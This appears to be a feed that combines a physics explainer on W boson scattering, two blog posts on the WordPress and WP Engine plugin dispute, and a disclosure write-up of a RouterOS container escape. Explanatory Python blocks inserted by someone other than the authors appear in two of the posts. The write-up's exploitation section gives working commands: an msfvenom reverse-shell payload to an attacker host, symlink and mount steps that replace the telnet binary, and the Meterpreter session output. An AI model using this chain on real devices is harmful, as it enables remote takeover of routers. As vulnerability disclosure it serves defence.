Is the Higgs boson doing its job?

By: VM
12 September 2025 at 13:19

At the heart of particle physics lies the Standard Model, a theory that has stood for nearly half a century as the best description of the subatomic realm. It tells us what particles exist, how they interact, and why the universe is stable at the smallest scales. The Standard Model has correctly predicted the outcomes of several experiments testing the limits of particle physics. Even then, however, physicists know that it's incomplete: it can't explain dark matter, why matter dominates over antimatter, and why the force of gravity is so weak compared to the other forces. To settle these mysteries, physicists have been conducting very detailed tests of the Model, each of which has either tightened their confidence in a hypothetical explanation or has revealed a new piece of the puzzle.

A central character in this story is a subatomic particle called the W boson, the carrier of the weak nuclear force. Without it, the Sun wouldn't shine, because the proton-proton fusion that powers it begins with a weak-force interaction. W bosons are also unusual among force carriers: unlike photons (the particles of light), they're massive, about 80 times heavier than a proton. This difference, a massless photon versus a massive W boson, arises from a process called the Higgs mechanism. Physicists first proposed this mechanism in 1964 and confirmed it was real when they found the Higgs boson at the Large Hadron Collider (LHC) in 2012.

The particles of the Standard Model of particle physics. The W bosons are shown among the force carriers on the right; the photon is denoted γ. The electron (e) and muon (µ) are shown among the leptons, with the corresponding neutrino flavours, denoted ν, on the bottom row. Credit: Daniel Dominguez/CERN

But finding the Higgs particle was only the beginning. To prove that the Higgs mechanism really works the way the theory says, physicists need to check its predictions in detail. One of the sharpest tests involves how W bosons scatter off each other at high energies. Both photons and W bosons carry one unit of quantum spin, but a massless photon can only be polarised transversely, i.e. with its spin perpendicular to its direction of travel. A massive W boson has a third option: its spin can also point along its direction of travel, in which case it's said to be longitudinally polarised. The longitudinal ones are special because that extra polarisation state is precisely what the Higgs mechanism supplies when it gives the W boson its mass, so their behaviour is directly tied to the mechanism.

Specifically, if the Higgs mechanism and the Higgs boson don't exist, calculations involving the longitudinal W bosons scattering off of each other quickly give rise to nonsensical mathematical results in the theory. The Higgs boson acts like a regulator in this engine, preventing the mathematics from 'blowing up'. In fact, in the 1970s, the theoretical physicists Benjamin Lee, Chris Quigg, and Hugh Thacker showed that without the Higgs boson, the weak force would become uncontrollably powerful at high energies, leading to the breakdown of the theory. Their work was an important theoretical pillar that justified building the colossal LHC machine to search for the Higgs boson particle.


The terms Higgs boson, Higgs field, and Higgs mechanism describe related but distinct ideas. The Higgs field is a kind of invisible medium thought to fill all of space. Particles like W bosons and Z bosons interact with this field as they move and through that interaction they acquire mass. This is the Higgs mechanism: the process by which particles that would otherwise be massless become heavy.

The Higgs boson is different: it's a particle that represents a vibration or a ripple in the Higgs field, just as a photon is a ripple in the electromagnetic field. Its discovery in 2012 confirmed that the field is real and not just something that appears in the mathematics of the theory. But discovery alone doesn't prove the mechanism is doing everything the theory demands. To test that, physicists need to look at situations where the Higgs boson's balancing role is crucial.

The scattering of longitudinally polarised W bosons is a good example. Without the Higgs boson, the probabilities of these scatterings grow uncontrollably with energy, but with the Higgs boson in the picture they stay within sensible bounds. Observing longitudinally polarised W bosons behaving as predicted is thus evidence for the particle as well as a check on the field and the mechanism behind it.

Imagine a roller-coaster without brakes. As it goes faster and faster, there's nothing to stop it from flying off the tracks. The Higgs mechanism is like the braking system that keeps the ride safe. Observing longitudinally polarised W bosons in the right proportions is equivalent to checking that the brakes actually work when the roller-coaster speeds up.

Illustration credit: Skyler Gerald

Another path that physicists once considered and that didn't involve a Higgs boson at all was called technicolor theory. Instead of a single kind of Higgs boson giving the W bosons their mass, technicolor proposed a brand-new force. Just as the strong nuclear force binds quarks into protons and neutrons, the hypothetical technicolor force would bind new "technifermion" particles into composite states. These bound states would mimic the Higgs boson's job of giving particles mass, while producing their own new signals in high-energy collisions.

The crucial test to check whether some given signals are due to the Higgs boson or due to technicolor lies in the behaviour of longitudinally polarised W bosons. In the Standard Model, their scattering is kept under control by the Higgs boson's balancing act. In technicolor, by contrast, there is no Higgs boson to cancel the runaway growth. The probability of the scattering of longitudinally polarised W bosons would therefore rise sharply with more energy, often leaving clearly excessive signals in the data.

Thus, observing longitudinally polarised W bosons at levels consistent with the predictions of the Standard Model, and not finding any additional signals, would also strengthen the case for the Higgs mechanism and weaken that for technicolor and other "Higgs-less" theories.

At the Large Hadron Collider, the cleanest way to look for such W bosons is in a phenomenon called vector boson scattering (VBS). In VBS, two protons collide and a quark inside each of them emits a W boson. These W bosons then scatter off each other before decaying into lighter particles. The leftover quarks form narrow sprays of particles, or 'jets', that fly far forward.

If the two W bosons happen to have the same electric charge, i.e. both positive or both negative, the process is even more distinctive. This same-sign WW scattering is rare, but few other processes produce the same signature, which makes it easier to pick out of the debris of particle collisions.

Both ATLAS and CMS, the two giant detectors at the LHC, had previously observed same-sign WW scattering without separating the polarisation states. In 2021, the CMS collaboration reported the first hint of longitudinal polarisation, but at a statistical significance of only 2.3 sigma, which isn't good enough (particle physicists want at least 3 sigma to claim evidence, and 5 sigma for a discovery). So after the LHC completed its second run in 2018, having collected data from around 10 quadrillion proton-proton collisions, the ATLAS collaboration set out to analyse it and deliver the evidence. The group's study was published in Physical Review Letters on September 10.

The layout of the Large Hadron Collider complex at CERN. Protons (p) are pre-accelerated to higher energies in steps, at the Proton Synchrotron (PS) and then the Super Proton Synchrotron (SPS), before being injected into the LHC ring. The machine then draws two opposing beams of protons from the SPS and accelerates them to nearly the speed of light before colliding them head-on at four locations, under the gaze of the four detectors. ATLAS and CMS are two of them. Credit: Arpad Horvath (CC BY-SA)

The challenge of finding longitudinally polarised W bosons is like finding a particular needle in a very large haystack where most of the needles look nearly identical. So ATLAS designed a special strategy.

One way a W boson can decay is to an electron or a muon plus a neutrino. If the W boson is positively charged, for example, it can decay to an anti-electron and an electron-neutrino, or to an anti-muon and a muon-neutrino; anti-electrons and anti-muons are positively charged. If it's negatively charged, the products can be an electron and an electron-antineutrino, or a muon and a muon-antineutrino. So first, ATLAS zeroed in on events with two electrons, two muons or one of each, both carrying the same electric charge. Neutrinos, however, are really hard to catch, so the ATLAS group looked for their absence rather than their presence. Momentum is conserved in every collision, and the incoming protons carry no momentum transverse to the beam, so the transverse momenta of everything produced must add up to zero. When the visible particles' transverse momenta don't balance, the missing amount must have been carried away by the neutrinos, like money unaccounted for in a ledger.

This analysis also required an event of interest to have at least two jets (reconstructed from sprays of particles) with a combined invariant mass above 500 GeV and separated widely in rapidity (a measure of their angle relative to the beam). This particular VBS pattern, two electrons/muons, two jets, and missing momentum, is the hallmark of same-sign WW scattering.

Second, even with these strict requirements, impostors can creep in. The biggest source of confusion was WZ production, a process in which another subatomic particle called the Z boson decays invisibly or one of its decay products goes unnoticed, making the event resemble WW scattering. Other sources include electrons having their charges mismeasured, jets masquerading as electrons/muons, and some quarks producing electrons/muons that slip into the sample. To control for all this noise, the ATLAS group used control regions: subsets of events dominated by one particular background, from which the group could calibrate how much of that background leaks into the signal sample and subtract it, thus also reducing the uncertainty in the final results.

Third, and this is where things get nuanced: the differences between transversely and longitudinally polarised W bosons show up in distributions, i.e. how far apart the electrons/muons are in angle, how the jets are oriented, and the energy of the system. But since no single variable could tell the whole story, the ATLAS group combined them using deep neural networks. These machine-learning models were fed up to 20 kinematic variables, including jet separations, particle angles, and missing momentum patterns, and trained to distinguish between three groups:

(i) Two transverse polarised W bosons;

(ii) One transverse polarised W boson and one longitudinally polarised W boson; and

(iii) Both longitudinally polarised W bosons

Fourth, the group combined the outputs of these neural networks and fit them with a maximum likelihood method. When physicists make measurements, they often don't directly see what they're measuring. Instead, they see data points that could have come from different possible scenarios. A likelihood is a number that tells them how probable the data is in a given scenario. If a model says "events should look like this," they can ask: "Given my actual data, how likely is that?" And the maximum likelihood method will help them decide the parameters that make the given data most likely to occur.

For example, say you toss a coin 100 times and get 62 heads. You wonder: is the coin fair or biased? If it's fair, the chance of exactly 62 heads is small. If the coin is slightly biased (heads with probability 0.62), the chance of 62 heads is higher. The maximum likelihood estimate picks the bias, or probability of heads, that makes your actual result most probable. So here the method would say "the coin's bias is 0.62", because this choice maximises the likelihood of seeing 62 heads out of 100.

In their analysis, the ATLAS group used the maximum likelihood method to check whether the LHC data 'preferred' a contribution from longitudinal scattering, after subtracting what background noise and transverse-only scattering could explain.
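The coin example, carried through as an added Python block (it is not from the article or from the ATLAS analysis; the 62-of-100 tally is the article's own constructed example, not data): it scans for the bias that maximises the binomial likelihood, then turns the gap between the best-fit and fair-coin likelihoods into a significance in sigma. That last step is the same likelihood-ratio construction behind numbers like "3.3 sigma" in the ATLAS paper, with the coin's bias standing in for the longitudinal signal strength. Function names are my own.

```python
import math

# Constructed example (the article's coin, not physics data): 100 tosses, 62 heads.
N_TOSSES = 100
N_HEADS = 62


def log_likelihood(p, heads=N_HEADS, tosses=N_TOSSES):
    """Binomial log-likelihood ln L(p) of seeing `heads` out of `tosses`.

    The binomial coefficient does not depend on p, so it is dropped: it
    cancels in every comparison made below.
    """
    if p <= 0.0 or p >= 1.0:
        return -math.inf
    return heads * math.log(p) + (tosses - heads) * math.log(1.0 - p)


def mle_bias(heads=N_HEADS, tosses=N_TOSSES, steps=1000):
    """Maximum-likelihood estimate of the heads probability by a grid scan.

    The scan stands in for the numerical maximisation a real fit performs;
    for a binomial the answer is heads/tosses in closed form.
    """
    grid = (i / steps for i in range(1, steps))
    return max(grid, key=lambda p: log_likelihood(p, heads, tosses))


def significance_vs_fair(heads=N_HEADS, tosses=N_TOSSES):
    """Local significance, in sigma, of 'biased coin' over 'fair coin'.

    The statistic q = 2 [ln L(p_hat) - ln L(0.5)] follows a chi-square with
    one degree of freedom for large samples (Wilks' theorem), so sqrt(q) is
    the significance in standard deviations. A physics fit does the same
    thing with the signal strength in place of p and many bins of
    neural-network output in place of one coin tally.
    """
    p_hat = mle_bias(heads, tosses)
    q = 2.0 * (log_likelihood(p_hat, heads, tosses) - log_likelihood(0.5, heads, tosses))
    return math.sqrt(max(q, 0.0))


if __name__ == "__main__":
    print("MLE bias:", mle_bias())
    print("significance vs fair coin: %.2f sigma" % significance_vs_fair())
```

With 62 heads the best-fit bias is 0.62 and the fair-coin hypothesis is disfavoured by about 2.4 sigma: suggestive, but below the 3 sigma particle physicists ask for before calling something evidence.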

The results may be a milestone in experimental particle physics. In the September 10 paper, ATLAS reported evidence for longitudinally polarised W bosons in same-sign WW scattering with an observed significance of 3.3 sigma, close to the 4 sigma that the Standard Model's predictions say a dataset of this size should yield. This means the data behaved as theory predicted, with no unexpected excess or deficit.

It's also bad news for technicolor theory. By observing longitudinal W bosons at exactly the rates predicted by the Standard Model, and not finding any additional signals, the ATLAS data strengthens the case for the Higgs mechanism providing the check on the W bosons' scattering probability, rather than the technicolor force.

The measured cross-section for events with at least one longitudinally polarised W boson was 0.88 femtobarns, with an uncertainty of 0.3 femtobarns. These figures essentially mean that there were only a few hundred same-sign WW scattering events in the full dataset of around 10 quadrillion proton-proton collisions. The fact that ATLAS could pull this signal out of such a background-heavy environment is a testament to the power of modern machine learning working with advanced statistical methods.

The group was also able to quantify the composition of signals. Among others:

  1. About 58% of events were genuine WW scattering
  2. Roughly 16% were from WZ production
  3. Around 18% arose from irrelevant electrons/muons, charge misidentification or the decay of energetic photons

One way to appreciate the importance of these findings is by analogy: imagine trying to hear a faint melody being played by a single violin in the middle of a roaring orchestra. The violin is the longitudinal signal; the orchestra is the flood of background noise. The neural networks are like sophisticated microphones and filters, tuned to pick out the violin's specific tone. The fact that ATLAS could not only hear it but also measure its volume, and find that it matches the score written by the Standard Model, is remarkable.

These results are more than just another tick mark for the Standard Model. They're a direct test of the Higgs mechanism in action. The discovery of the Higgs boson particle in 2012 was groundbreaking but proving that the Higgs mechanism performs its theoretical role requires demonstrating that it regulates the scattering of W bosons. By finding evidence for longitudinally polarised W bosons at the expected rate, ATLAS has done just that.

The results also set the stage for the future. The LHC is currently being upgraded to a form called the High-Luminosity LHC and it will begin operating later this decade, collecting datasets about 10x larger than what the LHC did in its second run. With that much more data, physicists will be able to study differential distributions, i.e. how the rate of longitudinal scattering varies with energy, angle or jet separation. These patterns are sensitive to hitherto unknown particles and forces, such as additional Higgs-like particles or modifications to the Higgs mechanism itself. And even small deviations from the Standard Model's predictions could hint at new frontiers in particle physics.

Indeed, history has often reminded physicists that such precision studies uncover surprises. For example, physicists didn't discover neutrino oscillations by finding a new particle but by noticing that the number of neutrinos arriving from the Sun at detectors on Earth didn't match expectations. Similarly, minuscule mismatches between theory and observations in the scattering of W bosons could someday reveal new physics, and if they do, the seeds will have been planted by studies like that of the ATLAS group.


On the methodological front, the analysis also showcases how particle physics is evolving. 'Classical' analyses once banked on tracking single variables; now, deep learning has played a starring role by combining many variables into a single discriminant, allowing ATLAS to pull the faint signal of longitudinally polarised W bosons from the noise. This approach could only become more important as both datasets and physicists' ambitions expand.

Perhaps the broadest lesson in all this is that science often advances by the unglamorous task of verifying the details. The discovery of the Higgs boson answered one question but opened many others; among them, measuring how it affects the scattering of W bosons is one of the more direct ways to probe whether the Standard Model is complete or just the first chapter of a longer story. Either way, the pursuit exemplifies the spirit of checking, rechecking, testing, and probing until scientists truly understand how nature works at extreme precision.

Matt Mullenweg and WordPress Hijack the Advanced Custom Fields Plugin

By: Nick Heer
13 October 2024 at 17:13

A bit of background, for those not steeped in the world of WordPress development: there exists a plugin called Advanced Custom Fields (ACF) which allows developers to create near-endless customization options for end clients in the standard page and post editor. It is hard to explain in a single paragraph (the WordPress.com guide is a good overview), but its utility is so singular as to be an essential component for many WordPress developers.

ACF was created by Elliot Condon who, in 2021, sold it to Delicious Brains. At this point, it was used on millions of websites, a few of which I built. I consider it near-irreplaceable for some specific and tricky development tasks. A year later, the entire Delicious Brains plugin catalogue was sold to WPEngine.

Matt Mullenweg:

On behalf of the WordPress security team, I am announcing that we are invoking point 18 of the plugin directory guidelines and are forking Advanced Custom Fields (ACF) into a new plugin, Secure Custom Fields. SCF has been updated to remove commercial upsells and fix a security problem.

[…]

Similar situations have happened before, but not at this scale. This is a rare and unusual situation brought on by WP Engine’s legal attacks, we do not anticipate this happening for other plugins.

This is an awfully casual way of announcing WordPress is hijacking one of the most popular third-party plugins in the directory. Mullenweg cites policy for doing so (WordPress can "make changes to a plugin, without developer consent, in the interest of public safety"), but the latter paragraph I quoted above makes clear the actual motive here. The "security problem" triggering this extraordinary action is a real but modest change to expand a patch from a previous update. But WordPress has removed the ability for WPEngine to make money off its own plugin, and if users have automatic plugin updates turned on, their ACF installation will be overwritten with WordPress' unauthorized copy.

Iain Poulson, of ACF:

The change to our published distribution, and under our 'slug' which uniquely identifies the ACF plugin and code that our users trust in the WordPress.org plugin repository, is inconsistent with open source values and principles. The change made by Mullenweg is maliciously being used to update millions of existing installations of ACF with code that is unapproved and untrusted by the Advanced Custom Fields team.

It is nearly impossible to get me to feel sympathetic for anything touched by private equity, but Mullenweg has done just that. He really is burning all goodwill for reasons I cannot quite understand. I do understand the message he is sending, though: Mullenweg is prepared to use the web’s most popular CMS and any third-party contributions as his personal weapon. Your carefully developed plugin is not safe in the WordPress ecosystem if you dare cross him or Automattic.


What the Hell Is Going on With WordPress and WPEngine?

By: Nick Heer
12 October 2024 at 04:31

I have been trying to stay informed of the hostile relationship between WordPress, Automattic, and Matt Mullenweg, and third-party hosting company WPEngine. Aram Zucker-Scharff put together a helpful and massive set of links to news coverage. Michael Tsai has a good collection of links, too, and Emma Roth and Samantha Cole have published notable articles.

From a distance, it looks like an expensive pissing match between a bunch of increasingly unlikable parties, and I would very much appreciate if it never affects my self-hosted version of WordPress. Maybe it is a little confusing that WPEngine is not affiliated with WordPress, but I only learned this week that WordPress.org is personally owned by Mullenweg and is not actually affiliated with Automattic or WordPress.com. From Mullenweg’s perspective, this confusion is beneficial, but the confusion with WPEngine is not. From my perspective, I would not like to be confused.

Also, if Mullenweg is mad about WPEngine (and Silver Lake, its private equity owner) benefitting from the open source nature of WordPress without what he feels is adequate compensation, I am not sure he has a leg to stand on. It does not sound like WPEngine is doing anything illegal. It is perhaps rude or immoral to build a private business named after and on the back of an open source project without significantly contributing, but surely that is the risk of developing software with that license. I am probably missing something here.


Symlinks as mount portals: Abusing container mount points on MikroTik's RouterOS to gain code execution

5 August 2022 at 03:00

RouterOS release 7.4beta4 introduced containers for MikroTik devices. From the changelog:

container - added support for running Docker (TM) containers on ARM, ARM64 and x86

It turns out that due to a couple of implementation flaws, it's possible to execute code on the host device via the container functionality.

Mount points

In the MikroTik documentation, it is shown that it's possible to create mount points between the host and the container. As an example, the etc folder on disk1 is mounted into /etc/pihole in the container:

/container/mounts/add name=etc_pihole src=disk1/etc dst=/etc/pihole

While playing around with this feature, I soon realized that the current implementation has three specific behaviours which together make the feature rather dangerous.

1. Paths are resolved through symlinks

Let's, for example, take the following directory structure:

disk1/
├── dir1/
│   ├── file1
│   └── file2
└── dir2/ --(symbolic link)--> dir1/

Even though dir2 is a symbolic link to dir1, adding a mount point to disk1/dir2/file1 works, meaning that dir2 is resolved to dir1 before the file is mounted.

2. Symlinks are resolved relative to the host device's root, not the container's root

Let's say my container's root filesystem is stored in disk1/alpine. If I do the following inside the container:

# ln -s / /rootfs

… then inside the container, the directory /rootfs resolves to / as expected. However, if I then use this directory as a mount point source when setting the container up in RouterOS, then the symbolic link is resolved in relation to the device's own filesystem.

As an example, I'll mount the host filesystem inside the container's /mnt directory:

/container/mounts/add name=rootfs src=/disk1/alpine/rootfs dst=/mnt

Then, from inside the created container, I can access the host's root filesystem:

# ls -l /mnt
total 0
drwxr-xr-x    2 nobody   nobody         149 Jun 15 11:38 bin
drwxr-xr-x    9 nobody   nobody         131 Jun 15 11:38 bndl
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 boot
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 dev
lrwxrwxrwx    1 nobody   nobody          11 Jun 15 11:38 dude -> /flash/dude
drwxr-xr-x    2 nobody   nobody         352 Jun 15 11:38 etc
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 flash
drwxr-xr-x    3 nobody   nobody          26 Jun 15 11:38 home
drwxr-xr-x    3 nobody   nobody         403 Jun 15 11:38 lib
drwxr-xr-x    5 nobody   nobody          73 Jun 15 11:38 nova
lrwxrwxrwx    1 nobody   nobody           9 Jun 15 11:38 pckg -> /ram/pckg
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 proc
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 ram
lrwxrwxrwx    1 nobody   nobody           9 Jun 15 11:38 rw -> /flash/rw
drwxr-xr-x    2 nobody   nobody          45 Jun 15 11:38 sbin
drwxr-xr-x    2 nobody   nobody           3 Jun 15 11:38 sys
lrwxrwxrwx    1 nobody   nobody           7 Jun 15 11:38 tmp -> /rw/tmp
drwxr-xr-x    5 nobody   nobody         111 Jun 15 11:38 var

While it's possible to read files, most of the filesystem is read-only, meaning it's not possible to write files. However…

3. Symlinks are resolved for both the src and dst parameters

What this effectively means is that by using this same rootfs symlink in the dst parameter, it is possible to mount any arbitrary directory or file from any location (even from inside the container) to any location on the host filesystem.

As an example, I create a mount point that mounts a robots.txt file from inside the container to the webfig directory, effectively "overwriting" the existing robots.txt:

/container/mounts/add name=robots src=/disk1/alpine/robots.txt dst=/rootfs/home/web/robots.txt

Then, on a third machine, we verify that it was overwritten using curl:

$ curl router.lan/robots.txt
Hello from inside the container!
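One way to close all three gaps at once, as an added Python example rather than MikroTik's actual fix (the vendor's patch isn't shown here): resolve every path component yourself and interpret symlink targets relative to the root the path is supposed to live under, so an absolute target like / means the disk's or the container's root rather than the host's. The function and directory names are my own; the layout it builds in a temporary directory mirrors the examples above (dir2 -> dir1, rootfs -> /, plus a self-referencing link to exercise the loop bound).

```python
import os
import tempfile

MAX_LINKS = 40  # assumed bound on symlink chasing, like the kernel's ELOOP limit


def resolve_in_root(root, path, max_links=MAX_LINKS):
    """Resolve `path` as it would appear to a process whose '/' is `root`.

    Each component is checked on the host, but a symlink target is interpreted
    relative to `root`: an absolute target such as '/' restarts at `root`, not
    at the host root, and '..' can never climb above `root`. The returned
    string is the host path; it may not exist yet (mount targets often don't).
    """
    root = os.path.realpath(root)
    pending = [p for p in path.split("/") if p and p != "."]
    resolved = []  # components below `root`, symlinks already expanded
    hops = 0
    while pending:
        comp = pending.pop(0)
        if comp == "..":
            if resolved:
                resolved.pop()
            continue
        candidate = os.path.join(root, *resolved, comp)
        if os.path.islink(candidate):
            hops += 1
            if hops > max_links:
                raise OSError("too many levels of symbolic links: %s" % path)
            target = os.readlink(candidate)
            if target.startswith("/"):
                resolved = []  # absolute link: back to the jail root
            # a relative link is relative to the link's own directory, which
            # is exactly `resolved` as it stands, so nothing else changes
            pending = [p for p in target.split("/") if p and p != "."] + pending
            continue
        resolved.append(comp)
    return os.path.join(root, *resolved)


def demo():
    """Rebuild the post's layout in a temp dir and resolve the attacker's paths.

    Returns host paths so the caller can compare naive and jailed resolution.
    """
    with tempfile.TemporaryDirectory() as disk1:
        alpine = os.path.join(disk1, "alpine")            # container rootfs
        os.makedirs(os.path.join(alpine, "etc"))
        os.makedirs(os.path.join(disk1, "dir1"))
        open(os.path.join(disk1, "dir1", "file1"), "w").close()
        os.symlink("dir1", os.path.join(disk1, "dir2"))   # behaviour 1
        os.symlink("/", os.path.join(alpine, "rootfs"))   # 'ln -s / /rootfs'
        os.symlink("loop", os.path.join(alpine, "loop"))  # self-referencing
        out = {
            "disk1": os.path.realpath(disk1),
            "alpine": os.path.realpath(alpine),
            # behaviour 1: a symlinked directory inside the jail still resolves
            "via_dir2": resolve_in_root(disk1, "dir2/file1"),
            # behaviour 2: host-side realpath() sends /rootfs to the real '/'
            "naive_src": os.path.realpath(
                os.path.join(alpine, "rootfs", "home", "web", "robots.txt")),
            # the same src resolved inside the disk: rootfs -> disk1 itself
            "jailed_src": resolve_in_root(disk1, "alpine/rootfs/home/web/robots.txt"),
            # behaviour 3: dst resolved inside the container root, not the host
            "jailed_dst": resolve_in_root(alpine, "/rootfs/home/web/robots.txt"),
        }
        try:
            resolve_in_root(alpine, "/loop")
            out["loop"] = "unbounded"
        except OSError:
            out["loop"] = "rejected"
        return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-10s %s" % (key, value))
```

Note the asymmetry this produces: following a symlink that stays inside the jail (behaviour 1) keeps working, which is the legitimate use, while the /rootfs trick lands on the disk's own root for the src side and on the container's root for the dst side, so nothing on the host can be mounted over. A dst resolved this way can still point at the container's own files, which is what a container mount is supposed to do.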

Exploitation

Mount-what-where is a very powerful primitive. It should be relatively easy to run arbitrary code - just mount over a preexisting executable on the system that gets executed by the device at some point.

However, that won't work, because of how the mount point is created. From /proc/mounts:

/dev/sda1 /nova/bin/telnet ext4 rw,nosuid,nodev,noexec,relatime 0 0

The mount point is created with the nosuid, nodev, and most importantly noexec options. This means that even if you were to mount over an existing binary, it would never get executed, and would instead fail with a "Permission denied" every time. This also extends to shared libraries, so mounting over .so files is also out of the question.

I also didn't spot any obvious config files which would allow running code.

This is where symlinks come to the rescue yet again.

As it turns out, symlinks existing on noexec filesystems but pointing to binaries existing on filesystems without noexec will still be executed:

$ cp $(which id) id1
$ ln -s $(which id) id2
$ ./id1
bash: ./id1: Permission denied
$ ./id2
uid=1000(xx) gid=1000(xx) groups=1000(xx)

This means that we can simply mount a symbolic link over a specific executable that points to the malicious binary we want to run, assuming it is accessible from some mount point that doesn't have the noexec flag set. By looking at /proc/mounts, we can see that the container's own root filesystem is actually not mounted with noexec (which makes sense - you wouldn't be able to run executables inside the container otherwise):

/dev/sda1 /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root ext4 rw,nosuid,nodev,relatime 0 0
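The noexec detail, as an added Python model (not code from the post): the kernel applies noexec to the mount that holds the file execve() finally reaches after following symlinks, so the question to ask of a mount table is "where does this path resolve to, and is that mount noexec?". The mount table below is built from the two /proc/mounts lines quoted above plus a made-up root entry, with the container id shortened to CID, and a dict stands in for os.readlink; the function names are my own.

```python
# Constructed mount table: the two /proc/mounts lines from the post plus a
# made-up root entry; the container id is shortened to CID.
PROC_MOUNTS = """\
rootfs / rootfs ro,relatime 0 0
/dev/sda1 /nova/bin/telnet ext4 rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /flash/rw/container/CID/root ext4 rw,nosuid,nodev,relatime 0 0
"""

# Constructed link map standing in for os.readlink on the device: the symlink
# that the mount places over telnet, pointing into the container's root.
LINKS = {
    "/nova/bin/telnet": "/flash/rw/container/CID/root/rev",
}

MAX_LINKS = 40  # bound on link chasing, like the kernel's ELOOP limit


def parse_mounts(text):
    """Return [(mount_point, set_of_options)] from /proc/mounts-style text."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _dev, mount_point, _fstype, opts = fields[:4]
        mounts.append((mount_point, set(opts.split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the mount that actually backs `path`."""
    best = None
    for mount_point, opts in mounts:
        prefix = mount_point.rstrip("/") + "/"
        if path == mount_point or path.startswith(prefix):
            if best is None or len(mount_point) > len(best[0]):
                best = (mount_point, opts)
    return best


def resolve_links(path, links, max_links=MAX_LINKS):
    """Follow symlinks the way execve() does before the permission check."""
    hops = 0
    while path in links:
        hops += 1
        if hops > max_links:
            raise OSError("too many levels of symbolic links: %s" % path)
        path = links[path]
    return path


def exec_allowed(path, mounts, links):
    """(allowed, mount_point): noexec is a property of the mount holding the
    resolved file, not of the path the caller named."""
    target = resolve_links(path, links)
    mount_point, opts = mount_for(target, mounts)
    return "noexec" not in opts, mount_point


MOUNTS = parse_mounts(PROC_MOUNTS)

if __name__ == "__main__":
    # A file mounted directly over telnet: denied by the noexec mount.
    print(exec_allowed("/nova/bin/telnet", MOUNTS, links={}))
    # A symlink mounted over telnet: the check lands on the container root.
    print(exec_allowed("/nova/bin/telnet", MOUNTS, links=LINKS))
```

Run against the post's own mount lines, the first call is refused at /nova/bin/telnet and the second is allowed because it is judged against the container root mount, which carries nosuid and nodev but not noexec. The same longest-prefix lookup is a quick way to audit a device: any writable mount reachable from a container that lacks noexec is a candidate landing spot for this trick.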

This is all we need to mount a successful attack. As the malicious binary, I generated a meterpreter/reverse_tcp ELF:

msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=10.4.0.245 LPORT=1338 -f elf > rev

I copied this inside the container and also created a symlink pointing to its location in the executable mount point:

ln -s /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root/rev /revlnk

As the target binary, I decided to use telnet, as it's relatively low-priority and easy to trigger and debug. I then created the mount point in RouterOS:

/container/mounts/add name=telnet src=/disk1/alpine/revlnk dst=/rootfs/nova/bin/telnet

After starting the container, the binary /nova/bin/telnet was mounted over and was instead a symlink to our malicious binary:

/nova/bin/telnet -> /flash/rw/container/aa10a963-9715-4c61-967c-7d9f993410e6/root/rev

As expected, after running /system/telnet 127.0.0.1 on the device, I got a connection in my Meterpreter listener:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.4.0.245:1338
[*] Sending stage (908480 bytes) to 10.4.0.1
[*] Meterpreter session 1 opened (10.4.0.245:1338 -> 10.4.0.1:59434) at 2022-06-21 10:24:34 +0300

meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  149   dir   2022-06-15 14:38:21 +0300  bin
040755/rwxr-xr-x  131   dir   2022-06-15 14:38:21 +0300  bndl
040755/rwxr-xr-x  3     dir   2022-06-15 14:38:21 +0300  boot
040755/rwxr-xr-x  6140  dir   2022-06-20 21:41:47 +0300  dev
                                                         dude
040755/rwxr-xr-x  352   dir   2022-06-15 14:38:21 +0300  etc
040755/rwxr-xr-x  1024  dir   2022-06-20 21:41:14 +0300  flash
040755/rwxr-xr-x  26    dir   2022-06-15 14:38:21 +0300  home
040755/rwxr-xr-x  403   dir   2022-06-15 14:38:21 +0300  lib
040755/rwxr-xr-x  73    dir   2022-06-15 14:38:21 +0300  nova
040755/rwxr-xr-x  200   dir   1970-01-01 03:00:12 +0300  pckg
040555/r-xr-xr-x  0     dir   1970-01-01 03:00:00 +0300  proc
041777/rwxrwxrwx  400   dir   2022-06-21 08:33:07 +0300  ram
040755/rwxr-xr-x  1024  dir   1970-01-01 03:00:14 +0300  rw
040755/rwxr-xr-x  45    dir   2022-06-15 14:38:21 +0300  sbin
040555/r-xr-xr-x  0     dir   1970-01-01 03:00:12 +0300  sys
040644/rw-r--r--  1024  dir   1970-01-01 03:00:19 +0300  tmp
040755/rwxr-xr-x  111   dir   2022-06-15 14:38:21 +0300  var

This means we can successfully execute arbitrary code on the device.

The issue is fixed in RouterOS versions 7.4beta5, 7.4, 7.5beta1, and higher.


Timeline

  • 21/06/2022 - Attempted to contact vendor
  • 21/06/2022 - Vendor response
  • 04/08/2022 - Assigned ID CVE-2022-34960
  • 05/08/2022 - Vendor informs of fixes in codebase
  • 05/08/2022 - Post published